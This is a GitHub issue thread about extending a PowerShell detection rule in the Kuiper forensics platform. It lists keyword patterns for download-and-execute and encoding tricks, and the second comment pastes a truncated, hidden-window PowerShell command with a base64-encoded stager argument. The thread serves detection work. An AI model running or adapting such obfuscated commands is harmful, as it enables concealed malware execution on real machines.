"Powershell_Execution" rule does not catch "-encodedcommand"

DFIRKuiper / Kuiper

Digital Forensics Investigation Platform

736 stars 110 forks source link

"Powershell_Execution" rule does not catch "-encodedcommand" #112

Closed congtrung2k1 closed 7 months ago

congtrung2k1 commented 10 months ago

In the Powershell_Execution rule of ./app/utils/Dracarys/Rhaegal/rules/malicious/rules.gh, it is only condition to catch text in Data like below: Event.EventData.Data.#text:

"downloadstring"
"downloadfile"
"iex"
" -e "

And there is another way to encode the command: -encodedcommand

Suggestion: Add string:

" -encodedcommand "

More strings should be added:

"FromBase64String"
" -File "
" -ExecutionPolicy ByPass "

congtrung2k1 commented 10 months ago

Here is an example payload:

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhAFcALwBpAFMAaABiADkAbgBQAHcASwBmADQAZwBFAEsASQBU

salehmuhaysin commented 7 months ago

the embedded Rhaegal is not enough to be honest, there is a lot of options not included, but it is a sample that help to create more custom rules